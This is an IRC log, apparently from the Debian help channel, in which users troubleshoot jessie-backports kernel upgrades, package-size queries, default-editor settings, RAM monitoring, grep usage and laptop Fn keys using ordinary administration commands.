3.16.39-1 (2016-12-30) i686 GNU/Linux
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1916[12:05:32] <carp> now sudo apt-get ssh ?
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1920[12:06:47] <missmbob> carp: do you have jessie-backports
enabled?
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1922[12:08:07] <carp> missmbob: id need to check that, what
command can i type to check please?
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1928[12:08:47] <missmbob> in /etc/apt/sources.list you'd
have a line listing jessie-backports. i doubt it. here's how to
set it up:
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1930[12:08:56] <missmbob> !jessie-backports
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1931[12:08:56] <dpkg> Selected packages intended for the Debian 9
"Stretch" release but recompiled for use with
"Jessie" (8.x) can be found in the
"jessie-backports" repository. Note that jessie-backports
are on the regular mirror network, not on backports.debian.org. A
suitable line for your sources.list is «deb
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1932[12:09:27] <missmbob> once you edit sources.list; sudo apt
update; sudo apt install -t jessie-backports linux-image-686-pae
linux-headers-686-pae (notice the -t jessie-backports). reboot.
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1934[12:09:46] <missmbob> that'll upgrade your kernel which
is obviously having problems from the ancient 3.16
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1936[12:09:58] <missmbob> to i think 4.8 right now
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1939[12:10:58] <missmbob> once you rebooted double check with
uname -a
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1943[12:12:13] <carp> missmbob: thankyou very much for this idea.
I checked and I dont have backport in the sources.list. I dont know
what backports are so I will have to research that. I dont
understand why my kernel is ancient though, ive installed the most
recent stable jessie. surely that should be ok.
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1944[12:12:26] <carp> what is the -t for?
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1946[12:13:46] <missmbob> carp: i had the dpkg bot spit out
instructions just above. missed it? stable jessie is ancient kernel.
that's normal. debian is old really.
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1949[12:14:20] <missmbob> !jessie-backports
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1951[12:14:20] <dpkg> Selected packages intended for the Debian 9
"Stretch" release but recompiled for use with
"Jessie" (8.x) can be found in the
"jessie-backports" repository. Note that jessie-backports
are on the regular mirror network, not on backports.debian.org. A
suitable line for your sources.list is «deb
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1952[12:14:24] <missmbob> there it is again ^
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1954[12:15:34] <carp> missmbob: thankyou very much for all your
help. (and patience with a complete idiot noob)
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1955[12:15:56] <missmbob> yeah well this idiot is going to have
to leave in a minute so you might be left :P
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1956[12:16:05] <missmbob> work time
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1957[12:16:26] <helpplease> what's the alternative to HOSTS
file when I need a format like "80.80.81.82 80.80.81.83",
instead of: "80.80.81.82 myhostname"? either I'm
doing something wrong or it won't work with 2 numeric hosts
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1959[12:17:08] <carp> i dont know what backports are or packages
recompiled for use with jessie, but i will research it. I will
reboot in a sec by pressing the button on the front of the tower and
try out your idea of installing backports.
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1964[12:17:55] <missmbob> carp: if you want more info than what
the bot gave you here are the full instructions
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mouse) but ive written it down for after i reboot.
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1992[12:30:11] <carp> Right, thankyou very much missmbob, ive
written everything down, here we go (rebooting now) cheers.
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2015[12:45:18] <asdfasd> I have a networkinterface with 2 ports
and the p0 gets defaulted at boottime. I'm trying to modify the
portsetting through editing the hardware parameters in
/sys/bus/ccwgroup device file. It works when I change it in a
running system but when as soon as i reboot the system it default to
p0, again. I've tried looking for parameters to pass through
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2016[12:45:18] <asdfasd> sysctl.cfg but no parameter seems to be
passable to the kernel in the remark that it affects the port
variable on my network interface. Anyone can help me in the right
direction?
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2054[13:04:59] <contrapunctus> How can I list installed packages
with their installed size?
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2056[13:05:48] <missmbob> aptitude search ~i -O installsize
-F"%p %I"
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2061[13:08:26] <contrapunctus> missmbob: thanks! anything with
apt/dpkg?
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2064[13:08:56] <missmbob> i dont think so
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2093[13:33:24] <flokuehn> hi. Is it true that there is no default
dns caching on debian / linux unless you install some software like
nscd or something else?
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2095[13:34:23] <missmbob> it's true
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2096[13:34:25] <Ticho_> yes
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2098[13:34:36] <flokuehn> thanks you.
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2099[13:34:42] <flokuehn> -s
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2116[13:42:04] <asdfasd> I have a networkinterface with 2 ports
and the p0 gets defaulted at boottime. I'm trying to modify the
portsetting through editing the hardware parameters in
/sys/bus/ccwgroup device file. It works when I change it in a
running system but when as soon as i reboot the system it default to
p0, again. I've tried looking for parameters to pass through
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2117[13:42:05] <asdfasd> sysctl.cfg but no parameter seems to be
passable to the kernel in the remark that it affects the port
variable on my network interface. Anyone can help me in the right
direction?
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2162[14:07:03] <contrapunctus> missmbob: I reckoned this should
work - but it doesn't :\ dpkg-query -W -f
"${Package}\t${Installed-Size}\n"
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2166[14:08:04] <themill> contrapunctus: you want single quotes
not double
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2167[14:08:25] <contrapunctus> oooh, awesome! thanks, themill !
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2171[14:09:08] <themill> (of course the installed size is wildly
inaccurate and can even be missing)
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2172[14:09:26] <contrapunctus> ...what :\
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2174[14:09:50] <contrapunctus> themill: No way to actually
calculate the total size of the installed package?
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2176[14:10:02] <themill> There is no way to do that for anything
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2178[14:10:14] <contrapunctus> (by maybe running du on all the
component files)
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2187[14:10:55] <petn-randall> Haha, it get's even more fun
on deduplicating filesystems :)
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2189[14:11:11] <themill> it's fun enough on any real
filesystem with a block size
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2193[14:12:28] <petn-randall> themill: Well, you could at least
say that it no more than $numfiles * blocksize off in accuracy.
Assuming nothing shipped in Debian is using sparse files.
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2194[14:12:33] <contrapunctus> themill: I don't understand -
doesn't one "just" need to du each installed file and
add the output?
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2195[14:12:58] <themill> contrapunctus: on whose machine running
on what filesystem with which settings?
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2197[14:13:14] <contrapunctus> huh o_O
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2202[14:15:11] <carp> OK so Ive successfully installed the newer
version using jessie-backports. yay. uname -a now reads
4.8.0.0.bpo.2 so it seems to have worked. and the computer hasnt
died. Now lets see how long it takes until the mouse freezes again,
or if it is fixed. Thanks for the help earlier guys.
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2207[14:16:29] <contrapunctus> themill: I don't get it :\
How does that matter? One can expect du(1) to work on every platform
it supports, right?
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2208[14:17:14] <themill> one can expect it to give a different
answer
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2209[14:17:34] <contrapunctus> and how off does it go?
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2210[14:17:41] <tw> ^- different block sizes on different
filesystems/storage
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2211[14:17:42] <themill> depends on the size of the file
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2212[14:17:59] <tw> it can't know for all filesystems it
might be installed on.
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2214[14:19:02] <petn-randall> contrapunctus: The easy question to
answer is "how many bytes large is file x?". The difficult
to answer question is "how much storage does file x use?",
which can vary wildly between systems.
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2216[14:19:51] * contrapunctus doesn't know anything about
filesystems :\
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2218[14:20:02] <themill> contrapunctus: a 1 byte file takes 4kB
on this machine
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2219[14:20:33] <contrapunctus> wat
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2222[14:20:41] <contrapunctus> How is that possible o_o'
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2223[14:20:49] <themill> however dpkg assumes it takes 1kB
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2224[14:21:12] <petn-randall> themill: No tail packing? ;)
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2225[14:21:38] <themill> no reiser4 either
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2236[14:23:14] <CuSn> contrapunctus: fielsystems are configured
to allocate a minimum chunk of disc space for each file. the size of
the chunk is proportional to the size of the partition. And 8 KB
chunk is pretty normal. When that first chunk is filled, another
chunk is allocated to the file. So when a file is 8001 bytes long,
it takes up 16 kb.
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2237[14:23:41] <asdfasd> I have a networkinterface with 2 ports
and the p0 gets defaulted at boottime. I'm trying to modify the
portsetting through editing the hardware parameters in
/sys/bus/ccwgroup device file. It works when I change it in a
running system but when as soon as i reboot the system it default to
p0, again. I've tried looking for parameters to pass through
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2238[14:23:41] <asdfasd> sysctl.cfg but no parameter seems to be
passable to the kernel in the remark that it affects the port
variable on my network interface. Anyone can help me in the right
direction?
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2239[14:24:12] <contrapunctus> CuSn: wtf
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2241[14:24:38] <CuSn> contrapunctus: can you be more specific?
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2242[14:25:03] <contrapunctus> anywhoo - so there's a
deviation of 8k. Doesn't sound like a big enough deal...
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2243[14:25:27] <themill> contrapunctus: here, have a million 1
byte files. How much space does that take?
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2244[14:25:45] <contrapunctus> themill: that's just what I
was wondering - what package installs a million files?
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2246[14:26:48] <contrapunctus> themill: also - how is
Installed-Size arrived at?
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2247[14:26:50] <tw> kernel source might come close
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2248[14:26:51] <unborn> contrapunctus: you would be more
productive if you would tell end user - in human words what the hell
you talking about.. most issues can be done with few lines..no mess
with all lines of the source..
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replaced-url
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2251[14:28:02] <contrapunctus> unborn: that happened a while ago
;) I've often wanted to know the installed size of packages.
Using this at the moment - dpkg-query -W -f
'${Package}\t${Installed-Size}\n'
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2253[14:28:23] <tw> asdfasd: I don't actually know what
you're trying to do, but have you tried driver parameters
instead of kernel cmdline params?
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2254[14:28:26] <contrapunctus> .o(p...p...perl...)
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2255[14:29:53] <unborn> contrapunctus: sure...still.. its same
issue.. sorry - user was asking for something and change in code is
trivial.. why so much 'issues' - without noticing end user
yeah that would be bad for this and that reason.. or perhaps for all
users... - you can see what I mean.
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2258[14:30:52] <asdfasd> tw: I'm trying to change the rules
for my driver module in /etc/udev
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2260[14:31:16] <unborn> ...and I would like to ask the same :)
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2264[14:33:13] <unborn> contrapunctus: so.. is there any
resolution touched end user?
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2268[14:35:54] <ws2k3> how can i change the default editor on
jessie?
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2271[14:36:14] <contrapunctus> unborn: I don't understand
anything you're saying :(
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2272[14:36:37] <themill> ws2k3: default editor in what context?
(gnome? terminal?)
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2273[14:36:40] <unborn> contrapunctus: oh i am sorry about this..
are you the dev ?
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2274[14:36:43] <themill> contrapunctus: that's fairly
typical
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2275[14:36:55] <ws2k3> themill terminal. i accidentily chose vim
and i desire nano
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2277[14:37:04] <epsilon> ws2k3: in bash? export
EDITOR='nano' in .bashrc
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2278[14:37:21] <themill> ws2k3: update-alternatives --config
editor
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2279[14:37:23] <jelly> epsilon: that's not what
"default" means!
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2280[14:37:27] <contrapunctus> themill: markov chain bot?
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2281[14:37:42] <ws2k3> jelly exacly i already compared the
.bashrc with another machine and they are the same
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2282[14:37:53] <themill> contrapunctus: that or drunk
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2283[14:37:57] <ws2k3> themill when i run that it shows that its
already using nano
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2284[14:38:11] <themill> ws2k3: so in what context is it using
vim?
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2285[14:38:16] <jelly> ws2k3: update-alternatives --config
config, maybe
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2286[14:38:21] <jelly> ws2k3: update-alternatives --config
editor, maybe
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2287[14:38:33] <contrapunctus> themill: so (as far as I can
gather from the source comments) Installed-Size is already
(roughly?) calculated from the files?
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2288[14:38:38] <ws2k3> themill crontab -e should open nanno
instead of vim
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2289[14:39:16] <unborn> ...he is possibly not..
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2291[14:39:35] <themill> contrapunctus: yes. And as long as there
aren't lots of small files, it will probably be ok
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2292[14:39:42] <contrapunctus> cool! :)
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2293[14:39:51] <contrapunctus> thanks for the help, everyone.
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2295[14:39:59] <themill> of course, that field can also be
missing entirely
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2296[14:41:00] <themill> ws2k3: what does "echo
$EDITOR" output? "echo $VISUAL"? When you say you
"chose vim" what did you do?
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2297[14:41:02] <unborn> contrapunctus: - you did not answers my
last question...
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2301[14:41:21] <themill> unborn: you're making even less
sense than normal, please stop
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2305[14:42:11] <unborn> themill: well.. I do not see this... as
normal user of debian non free.. - issue is still here... please
explain
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2307[14:42:36] <ws2k3> themill both are emty
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2310[14:42:58] <themill> unborn: you are the only person in this
channel having that discussion.
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2311[14:43:22] <ws2k3> themill when you boot the first time into
debian and run crontab -e then it asks you to chose a default editor
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2312[14:44:00] <themill> it does?
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2313[14:44:12] <ws2k3> themill yes it does
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2314[14:44:13] <unborn> themill and? I am perhaps the one who
dont understand and asking for explanation - the very best gnu
policy adopted of debian..
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2317[14:44:27] <n4dir> i thought something like
update-alternatives would set the default editor
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2319[14:45:25] <contrapunctus> unborn: I'm not 'the
dev' (of what?)
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2320[14:45:49] <contrapunctus> oh, +q.
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2325[14:48:27] <themill> ws2k3: so what does "readlink -f
/usr/bin/editor" say?
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2326[14:48:58] <ws2k3> themill /bin/nano
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2327[14:49:53] <themill> ws2k3: is it just crontab -e or is there
more to it? is sudo involved?
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2328[14:50:14] <ws2k3> the mibo sudo not involved yes its just
crontab -e
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2329[14:50:26] <ws2k3> themill i think it has something to do
with sensible-editor
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2330[14:50:39] <ws2k3> themill /usr/bin/sensible-editor
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2332[14:51:01] <themill> do you have a ~/.selected_editor ?
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2333[14:51:08] <ws2k3> themill yeah found it ^^
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2334[14:51:12] <ws2k3> themill there is the problem
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2335[14:51:14] <themill> :)
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2343[14:55:17] <andre144k> hi all - is it possible to change
umask for a special directory automaticly?
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2346[14:55:57] <andre144k> mayby to create all files with 600
instead of 664?
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2354[14:57:48] <tw> you can do it with acls, but I don't
know that it is possible with umask
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2356[14:58:09] <andre144k> oki - i alreadythought so...
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2367[15:00:52] <graps> Hi all
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2369[15:01:28] <tw> andre144k: If I remember correctly, it'd
be something like setfacl -d -m u::rwX,g::rwX,o::rX directory
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2370[15:02:08] <contrapunctus> Okay - I'm now using
'dpkg-query -W -f
'${Package;-30}\t${Installed-Size}\n' | sort -n -k 2'
- how can I make the Installed-Size be presented in a human-readable
format?
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2371[15:02:12] <tw> and that will cascade into subdirectories.
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2373[15:02:46] <graps> How do I check the programs that use RAM
besides using free ?
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2374[15:03:00] <contrapunctus> graps: top, htop
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2376[15:03:13] <graps> contrapunctus: Thanks !
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2377[15:03:13] <tw> or ps, but the syntax is less easy.
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2382[15:04:23] <graps> tw: Thanks
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2383[15:05:18] <contrapunctus> (like df -h or du -h)
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2384[15:05:51] <graps> contrapunctus: Right
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2385[15:05:51] <themill> contrapunctus: you could probably make
an awk monstronsity for that...
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2386[15:06:31] <zykotick9> contrapunctus: fyi, if you're
interested in the size of installed packages you might be intereted
in the 'dpigs' program in the debian-goodies package
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2389[15:07:22] <jelly> !sort by size
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2390[15:07:22] <dpkg> sort by size is, like, aptitude search ~i
-O installsize -F"%p %I", or see <sort by size
sarge>, or see <dpigs>
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2391[15:07:34] <graps> contrapunctus or tw: Can I manipulate RAM
usage for running programs using ps ? I want to allocate different
RAM usage, is that possible ?
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2392[15:07:46] <jelly> graps: no
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2394[15:08:11] <graps> jelly: The kernel manages apps/programs
RAM usage ?
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2396[15:08:23] <jelly> ps only displays info.
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2397[15:08:38] <jelly> processes themselves ask for memory
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2398[15:09:21] <graps> jelly: How about nice or renice ? Can they
allocate RAM ?
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2399[15:09:36] <jelly> again, only processes themselves do it.
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2401[15:09:45] <n4dir> ps_mem.py is a nice way to get info about
Ram usage
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2403[15:11:55] <jelly> graps: you can however attach a debugger
and then massage the internals of a process
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2404[15:12:13] <petn-randall> graps: Tell us about your big
picture goal. What do you want to achieve?
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2407[15:12:47] <jelly> but even if you make a process do some
more sbrk() it's still done inside that process
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2408[15:13:35] <jelly> ,i smem
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2409[15:13:36] <judd> Package smem (utils, extra) in
jessie/amd64: memory reporting tool. Version: 1.4-2; Size: 10.1k;
Installed: 61k; Homepage:
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2411[15:13:50] <jelly> graps: ^^ may find that one interesting as
well
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2415[15:14:58] <graps> petn-randall: I'd like to work with
existing RAM and find out what's using up RAM at any given
time. For instance, if I have 512MB and 490MB is being used, how do
I read the top to find them ?
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2416[15:15:30] <petn-randall> graps: Use htop, and sort by RAM.
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2417[15:15:33] <petn-randall> also:
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2418[15:15:36] <petn-randall> !linux ate my ram
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2420[15:15:48] <n4dir> graps: ps_mem.py does that pretty well
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2422[15:16:20] <graps> n4dir: I downloaded it from codewiz. Is it
Debian-ready ?
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2424[15:16:27] <zykotick9> !atemyram
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2425[15:16:27] <dpkg> "Linux ate my ram!" No, it
didn't. Read this:
replaced-url
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2427[15:16:41] <zykotick9> graps: ^
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2428[15:16:50] <n4dir> graps: works for me.
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2429[15:16:52] <graps> zykotick9: Thanks
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2430[15:17:07] <n4dir> output looks like this:
replaced-url
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2431[15:17:22] <petn-randall> zykotick9: Ah, was looking through
the factoid DB for that. That's the one, thanks.
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2432[15:17:28] <zykotick9> graps: it's petn-randall who
should get thanked ;) (even if they forgot the factoid)
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2435[15:17:37] <zykotick9> petn-randall: ;)
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2437[15:17:48] <petn-randall> ;)
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2438[15:18:14] <graps> petn-randall: Thanks !
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2443[15:19:48] <graps> jelly: Thanks for the reference to
judd's smem inference
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2448[15:21:14] <ambient> Hello, when I try to update Tor Browser
I get 'Signature verification failed! You might be under
attack, or there might just be a networking problem.' I
reinstalled the gpg key and followed the install process on the Tor
page, the same miserbale results. I had tor browser for months but
it refuses to update now...
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2450[15:21:33] <ambient> So that is Tor browser, not Tor
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2451[15:22:04] <contrapunctus> thanks zykotick9 and jelly
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2452[15:22:07] <n4dir> gotta: linux have got way better in the
recent years to make it look as if it would eat RAM. Wondering how
anything could get done in the bast.
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2453[15:22:11] <contrapunctus> that seems geared towards my aim
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2457[15:22:22] <contrapunctus> oh lol. 'pigs'
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2459[15:22:42] <petn-randall> ambient: I'd ask in the
project's channel, they probably know the problem if it's
anything else than an attack.
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2467[15:24:44] <ambient> No one else uses Tor browser here I
guess...
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2469[15:25:07] <petn-randall> ambient: I'm pretty sure
everyone in the tor channel does, though.
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2471[15:25:23] <Errick72> I'm trying to install debian 8
64amd and I am getting this error. "Ata7.00: status:
{drdy}" it hangs there and won't finish boot won't
get to the installer
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2472[15:25:37] <ambient> petn-randall, Have you been there?
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2483[15:29:16] <petn-randall> !tor
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2484[15:29:16] <dpkg> The Onion Router (Tor) is a low-latency
anonymous communication system. Packaged for Debian, only enables
the onion proxy by default. For use on OFTC, ask me about <oftc
tor>. Tor is not allowed on freenode's #debian (replaced-url
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2485[15:29:25] <petn-randall> ambient: Not yet, why do you ask?
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2487[15:30:24] <zykotick9> ambient: fyi, i just updated TB from
6.0.8 -> 6.5 without issues <- still not a #d issue
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2510[15:41:12] <jhutchins_wk> Installing on VBox on a flash
drive. Man, that's fast.
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2519[15:45:17] <contrapunctus> themill: dpigs is the bees knees
:D
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2541[15:55:15] <themill> contrapunctus: :)
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2551[15:57:30] <Jack_> hi..
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2554[15:58:28] <GPenguin> hello
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2556[15:59:06] <Jack_> when will be Debian Stretch released?
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2558[15:59:16] <GPenguin> maybe mid of the year
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2560[15:59:40] <somiaj> !stretch pool 1
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2561[15:59:40] <dpkg> ! cruncher=2017-04-12 cruncher=2017-02-18
bæbīlen=2017-05-06 TomTomTosch=2017-08-08 greycat=2017-08-15
jellÿ=2017-03-17 themíll=2017-05-01
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2563[16:00:17] <somiaj> Jack_: Feb 5th is the final freeze, after
that 6 months give or take a few months. The debian team was more
agressive with removing packages, getting rc bugs fixed for jessie,
I assume they are going to do the same for stretch.
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2564[16:00:22] <GPenguin> why is cruncher 2x in the list?
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2566[16:00:30] <Jack_> ok. Is Stretch going to be a stable
release?
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2567[16:00:41] <GPenguin> yes
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2568[16:00:43] <petn-randall> GPenguin: They paid twice into the
pool, I guess ;)
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2569[16:00:49] <Jack_> ok
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2570[16:00:54] <GPenguin> petn-randall: haha
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2571[16:00:59] <somiaj> Jack_: you can also follow
replaced-url
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2573[16:01:10] <Jack_> ok.
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2574[16:01:29] <somiaj> cruncher updated his bet the a week or
two ago, since his original one was before they pushed the freeze
dates to get the lts kernel in stretch.
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2579[16:02:29] <GPenguin> i remember that, the 4.9.x kernel
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2582[16:03:32] <somiaj> they updated before the 4.9 kernel was
annouced to be the lts, but it ended up working well, the 4.9 kernel
transition into stretch, so now it is mostly just waiting for the rc
bugs to be dealt with along with double checking cerain release
goals
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2587[16:04:14] <GPenguin> somiaj: ah, thats interesting, thank
you
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2588[16:04:18] <Aimmy> Hi. Is there any program in synaptic that
can open .rar file?
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2589[16:04:44] <GPenguin> Aimmy: unrar can do it
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2590[16:04:46] <Jack_> Why doesn't Debian try to present
itself as a distro that works out of the box and is beginner
friendly?
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2592[16:05:12] <Jack_> I mean, Debian being stable is more
suitable for beginners.
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2593[16:05:12] <somiaj> there is also an unrar-unfree that I
think can deal with a wider varitey of .rar files
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2594[16:05:24] <Aimmy> GPenguin: Sweet. Thanks.
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2596[16:05:39] <GPenguin> :)
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2602[16:06:00] <jelly> Jack_: debian's goals make it not
work out of the box on a lot of modern hardware
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2604[16:06:20] <somiaj> Jack_: that is part of what it does
present itself as, releasing frozen stable systems that are well
tested. Though there are a few hurdels beginners have to deal with.
One is newer hardware may not be supported with the stable kernel,
and non-free firmawre is something many have to deal with they
don't have to deal with elsewhere due to the DSFG
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2607[16:06:51] <Jack_> ok.
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2608[16:07:03] <jelly> also, someone has to do the work
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2615[16:08:49] <GPenguin> on the one side is popularity in a
small user segment where other distros pickup people already. on the
other side is debian as universal operating system which it
definetly is
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2631[16:14:27] <jhutchins_wk> I think it's more important
for Debian to be powerful and flexible than least-common-denominator
friendly.
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2632[16:15:07] <Jack_> ok
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2633[16:15:09] <n4dir> d
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2634[16:16:15] <Jack_> is ubuntu based on debian testing or
unstable?
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2638[16:16:54] <tomcres> Jack_: they take the packages from sid
(!)
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2641[16:17:22] <somiaj> Jack_: ubuntu isn't based on debian
anymore, ubuntu has its own core which it does its own thing with
(very different from debian) that happens to use packages from sid
for its universe
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2643[16:17:36] <somiaj> so ubuntu makes sid packages available
but core is its own thing that is quite different than debian.
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2645[16:18:25] <Jack_> ok.
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2646[16:18:48] <sine0> what can I use to search all text files
for a word
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2647[16:18:55] <tomcres> sine0: grep
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2648[16:19:04] <tomcres> grep expression file
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2649[16:19:16] <sine0> could you please show me the syntax
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2650[16:19:24] <somiaj> tomcres: just did
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2651[16:19:36] <tomcres> yeah, if you want to search all text
files for "foo", you type grep foo *.txt
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2652[16:19:48] <Jack_> can I install Debian unofficial release
completely offline?
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2655[16:20:12] <Jack_> or do I need to be connected to the
internet during installation?
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2656[16:20:19] <somiaj> Jack_: I don't think full cd's
of packages for the installer are made until after the release.
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2657[16:20:22] <petn-randall> Jack_: What is the unofficial
release_
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2658[16:20:23] <petn-randall> ?
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2659[16:20:51] <jelly> Jack_: if you're talking about
firmware images, same thing as official images. You can install the
base system completely offline.
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2660[16:20:52] <zykotick9> sine0: <sidenote> there is a -r
and -R option in rsync, you might want to check out "man
rsync" for details
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2661[16:20:53] <somiaj> I took it to mean the develoment
versions, testing or unstable.
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2662[16:20:55] <sine0> im trying to get it to do it recursivly
from the directory I am at
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2664[16:21:19] <n4dir> recursivly often is -r
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2665[16:21:20] <somiaj> sine0: man grep, it will tell you lots of
useful info like the -r flag is recursive
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2666[16:22:07] <Jack_> jelly, exactly. I was referring to that.
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2668[16:22:29] <Jack_> firmware images
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2674[16:22:56] <somiaj> I thought only the netinstall had
firmware images made, so you can install offline with it, but you
won't have to many packages
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2675[16:23:04] <somiaj> though there are live images with
firmware
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2676[16:23:07] <ksk> HEy guys, I have a somewhat exotic question;
If two useradd commands to run at the same time - will that brake
things? I would suspect that to be the case.
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2677[16:23:09] <Jack_>
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2678[16:23:33] <the_sniff> using backuppc i always get this error
"Parent read EOF from child: fatal error!" (not for the
same file), can't figure out what it is after a long time
googling. Should I just try a different backup software? Tried
rsnapshot, had some weird bug with no way to fix it too
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2680[16:23:35] <n4dir> i got a question too, ksk why would one
want to do that at all?
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2681[16:24:05] <ksk> n4dir: you probably dont want to, but what
if you had two admins that add a user at the same time? (or some
automatism)
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2695[16:28:17] <petn-randall> ksk: There is probably no locking
in place, correct. If in doubt, automate it and see if you can break
useradd by running at the same time.
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2696[16:28:57] <Jack_> how is Debian different from Arch and
Fedora?
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2702[16:29:46] <abrotman> Jack_: in many ways .. What
specifically are you asking about?
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2704[16:30:44] <Jack_> ease of use, security, number of packages
available etc.
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2706[16:32:04] <teraflops> ksk: at the very same time? use
parallel or something like that and see if it fails
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2707[16:32:43] <petn-randall> Jack_: Debian has a huge (>
40,000) armount of packages, and supports upgrading from one release
to the next. It has a rather strict "only security
bugfixes" policy on the stable release.
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2708[16:32:58] <petn-randall> Jack_: Other distros probably shine
due to ease of use, or commercial support, etc.
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2709[16:33:07] <Jack_> ok
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2714[16:34:15] <ksk> petn-randall: teraflops thanks
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2716[16:34:25] <somiaj> Jack_: community is something that
shoudln't get overlooked too, .rpm has a big community both on
the fedora side and on the enterprise size with RHEL and CENTOS, the
community and what sort of work they do to better their distro of
choice is a large factor too (outside of policy)
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2718[16:34:44] <somiaj> Jack_: what makes debian differnt than
lots of its derivatives is its policy and quality control.
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2719[16:34:56] <somiaj> (not that other's don't have
policy or quality control, it is just different than debians)
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2721[16:34:58] <petn-randall> Jack_: Debian also puts a lot of
emphasis on keeping free software separate from non-free software,
which is why some wifi devices don't work with the default
installer. Ubuntu for example doesn't care that much, but that
also allows end users to install with less problems.
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2722[16:35:16] <Jack_> ok
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2770[16:57:58] <john876> hi all ... i need a bit of help with
update-rc.d and insserv
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2776[16:58:31] <somiaj> john876: on jessie? Are you using sysvrc
or systemd?
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2777[16:58:50] <john876> i wrote a simple script that is suppose
to run during boot and kill during halt
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2778[16:58:52] <somiaj> john876: update-rc.d still works, but
with systemd systemctl gives you more control. inserv may not work
with all systemd services (unsure)
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2781[16:59:10] <somiaj> john876: if using systemd, you should
write a unit file for your script.
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2782[16:59:15] <john876> ..but i dont want to stop it during
reboot
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2783[16:59:53] <john876> this is raspbian. i tried the raspbian
channel yesterday but did not get a pip
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2786[17:00:53] <somiaj> you do know that raspbian is not debian
and not supported here and you are still asking?
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2790[17:01:23] <somiaj> anyways, unsure what init system raspbian
went with. the 'not stop at reboot' seems like a strange
condition because a reboot is still a halt, and the system
completely shuts down.
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2807[17:07:10] <jhutchins_wk> somiaj: If the system shut down
completely, how would it be able to boot?
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2813[17:08:29] <somiaj> jhutchins_wk: I assumed that was done by
the bios, so the actual shutdown call to the hardware is different
at the end, but all actual services that are running would be
shutdown normally (As opposed to just beign killed)
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2814[17:09:01] <somiaj> so I guess it just seems weird to me to
not want to shut down a service properly if rebooting.
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2817[17:09:28] <john876> how does it differentiate with runlevel
0 and runlevel 6?
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2819[17:09:47] <john876> oops moving to #raspbian
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2820[17:10:19] <somiaj> john876: if using systemd, runlevels
aren't used, maybe systemd has a flag to do something different
on a reboot call vs a shutdown call.
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2824[17:11:34] <somiaj> oh my system the only difference between
the links in those runlevels is the last call, either a halt or
shutdown call.
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2825[17:11:35] <john876> oh that explains a lot. thanks somaij
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2828[17:12:27] <somiaj> I guess you could have more differences,
but besides for the actual hardware call or maybe what you log, I
don't see why you wouldn't want to properly kill all
services during a reboot.
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2834[17:14:33] <john876> i am ok for killing it during reboot, i
dont understand when i have it killed in rc0.d and not in rc6.d. so
i kept asking why??? your systemd comment explains that
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2841[17:17:14] <hmuller> is there a document that describes the
rationale for the packages that go into a debootstrap base and
minbase variants?
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2867[17:26:38] <Night_Elf> Hi all. I want to have a look at
Docker, and am reading here:
replaced-url
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2868[17:26:49] <Night_Elf> Do these packages exist?
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2875[17:29:24] <TomTomTo1> ,i linux-image-extra-virtual
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2876[17:29:25] <judd> No package named
'linux-image-extra-virtual' was found in jessie/amd64.
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2879[17:29:37] <TomTomTo1> ,i linux-image-extra-3.16.0-4-amd64
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2880[17:29:38] <judd> No package named
'linux-image-extra-3.16.0-4-amd64' was found in
jessie/amd64.
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2882[17:30:19] <TomTomTo1> no such thing. looks like it actually
applies to some versions of ubuntu instead. ^^
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2891[17:34:14] <jelly> Night_Elf: whoever wrote that does not
know enough about debian
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2892[17:34:24] <Night_Elf> TomTomTo1: I see. Sounds reasonable.
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2893[17:34:28] <msev-> does anyone here have an orange pi zero :D
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2894[17:34:29] <Night_Elf> jelly: dito.
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2895[17:35:24] <redrabbit> msev-: lol
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2901[17:41:58] <otyugh_II> hey
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2903[17:42:17] <otyugh_II> I've got some key of a laptop
(combined with "fn") which does no output into xev
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2905[17:42:27] <otyugh_II> any idea how I could bind them to
something again ?
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2908[17:42:54] <somiaj> depends, it could be they keycode it
generates is being intercepted by your WM and not making it to xev
so you won't see it
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2909[17:43:22] <somiaj> it could be that combination never
generates a keycode, I've seen some models have fn+button that
trigger firmware actions but don't send keycodes to the os
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2913[17:45:40] <otyugh_II> somiaj, han
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2915[17:45:46] <otyugh_II> How can I check that ?
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2916[17:46:12] <somiaj> to check that it isn't your de/wm
getting in the way, you can run xev in an xsession with no wm/de
running (only say xterm)
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2919[17:46:46] <somiaj> or you can check the keybindings in your
wm/de and see what keycodes it is looking for an intercepting. I
would expcect the key code of the volume up button to be the same on
most laptops for instance.
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2920[17:46:54] <somiaj> well the symbolic name that xev will give
you
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2923[17:47:37] <hmuller> msev-: nope, a rpi3
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2924[17:48:45] <otyugh_II> somiaj, testing that
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2938[17:54:02] <otyugh_II> xD
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2940[17:54:24] <otyugh_II> somiaj, I cant' get how to focus
xev without window manager !
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2943[17:55:39] <somiaj> otyugh_II: just move your mouse over it
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2944[17:55:52] <somiaj> I think that works in default xorg, I
know i've done this test, but its been a while
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2946[17:56:35] <otyugh_II> you are right
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2947[17:56:58] <otyugh_II> nah
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2948[17:57:00] <otyugh_II> no output
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2950[17:57:12] <otyugh_II> it's the "up sound",
"down sound" level
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2952[17:57:20] <otyugh_II> weird
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2955[17:57:43] <otyugh_II> the "mute" button is
recognized
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2956[17:57:44] <somiaj> yea most likley your DE is already
configured to do something with those keys
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2957[17:57:50] <somiaj> and intercepting the events
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2958[17:57:55] <otyugh_II> nah
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2959[17:57:59] <otyugh_II> there is no DE here
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2961[17:58:10] <otyugh_II> I'm in a xterm only session
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2962[17:58:18] <somiaj> oh even then they aren't producing
keycodes?
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2963[17:58:23] <otyugh_II> nah
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2964[17:58:35] <otyugh_II> but there is something I just saw
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2965[17:58:42] <otyugh_II> some key don't display what they
should
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2966[17:58:44] <somiaj> you don't have something else
running in the seeions like a key binding app (just double checking)
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2967[17:58:50] <otyugh_II> a bad layout maybe be causing this ?
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2968[17:58:55] <somiaj> maybe
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2969[17:59:10] <otyugh_II> somiaj, yep I'll try killing the
old session
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2973[18:00:03] <otyugh_II> same :(
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2974[18:00:42] <somiaj> unsure, I have only basic experience as I
don't really use that much hardware, and what I have used the
few keys I needed worked as expected...
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2975[18:00:42] <otyugh_II> weird
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2976[18:00:53] <otyugh_II> only happens on two keys on the
keyboard
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2977[18:01:00] <somiaj> what ones?
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2978[18:01:06] <otyugh_II> up and down sound
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2979[18:01:16] <otyugh_II> but without "fn" the key
just works
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2980[18:01:19] <tomcres> otyugh_II: does the volume change at all
when you press them?
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2982[18:01:23] <otyugh_II> nah
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2983[18:01:41] <somiaj> strange, though again some times the
firmware does its own thing with those bindings. Though I would
suppect those two be sent to the os.
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2984[18:01:58] <otyugh_II> the mute button just one key, just
along, triggers X86Mute, which is super standard
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2985[18:01:58] <tomcres> otyugh_II: weird. maybe it's an
event handled by the sound hardware and not the keyboard controller.
